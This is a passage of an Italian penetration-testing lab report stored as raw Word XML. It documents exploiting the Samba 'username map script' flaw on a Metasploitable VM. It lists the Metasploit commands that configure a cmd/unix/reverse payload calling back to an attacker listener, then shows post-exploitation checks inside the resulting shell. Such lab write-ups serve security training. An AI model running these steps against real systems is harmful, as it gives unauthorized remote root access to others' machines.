        <w:t xml:space="preserve">La vulnerabilità in oggetto origina da un'errata gestione, da parte del demone Samba, del parametro di configurazione "username map script": in presenza di tale configurazione, versioni di Samba antecedenti alla 3.0.25 risultano suscettibili all'iniezione di caratteri di shell metacaratteri all'interno del campo username durante il processo di autenticazione SMB, consentendo l'esecuzione di comandi arbitrari sul sistema operativo sottostante con i privilegi del processo smbd, tipicamente eseguito con privilegi elevati (root).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Fase 2 — Sfruttamento con Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Selezione del modulo di exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stata avviata la console del Metasploit Framework e ricercato, all'interno del relativo database di moduli, l'exploit corrispondente alla vulnerabilità identificata:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfconsole</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msf6 &gt; search usermap_script</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msf6 &gt; use exploit/multi/samba/usermap_script</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il modulo selezionato, denominato exploit/multi/samba/usermap_script, implementa in maniera automatizzata la tecnica di sfruttamento sopra descritta, incapsulando la logica di iniezione del payload all'interno del parametro username della richiesta di autenticazione SMB.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Configurazione dei parametri dell'exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sono stati quindi configurati i parametri necessari all'esecuzione del modulo, relativi rispettivamente al sistema target (RHOSTS, RPORT), al tipo di payload da eseguire (PAYLOAD) e ai parametri del listener in ascolto sulla macchina attaccante (LHOST, LPORT):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; set RHOSTS 192.168.50.150</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msf6 &gt; set RPORT 445</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msf6 &gt; set PAYLOAD cmd/unix/reverse</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msf6 &gt; set LHOST 192.168.50.100</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msf6 &gt; set LPORT 5555</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="434975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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3810000" cy="434975"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 4 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configurazione dei parametri del modulo Metasploit: impostazione dell'host target (RHOSTS 192.168.50.150) e della porta del listener (LPORT 5555).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al fine di verificare la correttezza della configurazione impostata prima dell'esecuzione dell'exploit, è stato invocato il comando show options, il cui output ha confermato la corretta valorizzazione di tutti i parametri obbligatori richiesti dal modulo e dal relativo payload.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="1878965"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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207000" cy="1878965"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 5 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output del comando show options nel Metasploit Framework: riepilogo dei parametri del modulo exploit/multi/samba/usermap_script (RHOSTS 192.168.50.150, RPORT 445) e del payload cmd/unix/reverse (LHOST 192.168.50.100, LPORT 5555).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Esecuzione dell'exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificata la correttezza della configurazione, è stato impartito il comando di esecuzione dell'exploit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esecuzione ha determinato l'apertura di un handler TCP in modalità reverse sulla macchina attaccante (192.168.50.100:5555), seguita dall'instaurazione della connessione da parte del sistema target e dalla conseguente apertura di una sessione di comando (command shell) verso il sistema Metasploitable, secondo la sequenza tipica del payload cmd/unix/reverse. Il conseguimento dell'accesso è stato confermato, in luogo di un'evidenza testuale isolata del messaggio di apertura sessione, mediante l'esecuzione diretta di comandi di verifica all'interno della shell ottenuta, documentata nella fase successiva, i cui esiti costituiscono prova inequivocabile dell'avvenuto accesso remoto al sistema target.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Fase 3 — Verifica dell'Accesso e Post-Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al fine di confermare l'effettivo conseguimento dell'accesso al sistema target e di caratterizzarne il contesto di privilegio, sono stati eseguiti, all'interno della shell remota ottenuta, alcuni comandi di enumerazione di base.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Verifica dell'indirizzo di rete</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stato in primo luogo eseguito il comando ifconfig, al fine di confermare che la shell ottenuta fosse effettivamente riconducibile al sistema target e non a un errore di configurazione del laboratorio:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="2378075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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207000" cy="2378075"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 6 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output del comando ifconfig eseguito nella shell remota ottenuta: l'interfaccia eth0 riporta l'indirizzo inet addr:192.168.50.150, corrispondente all'indirizzo IP del sistema target, a conferma dell'avvenuto accesso.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'output ottenuto ha confermato la corrispondenza tra l'indirizzo IP restituito dall'interfaccia di rete (192.168.50.150) e l'indirizzo del sistema target, validando in maniera inequivocabile il conseguimento dell'accesso remoto.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Enumerazione del contesto utente e del sistema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sono stati successivamente eseguiti ulteriori comandi di enumerazione, finalizzati a caratterizzare il livello di privilegio ottenuto e le principali informazioni di sistema:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
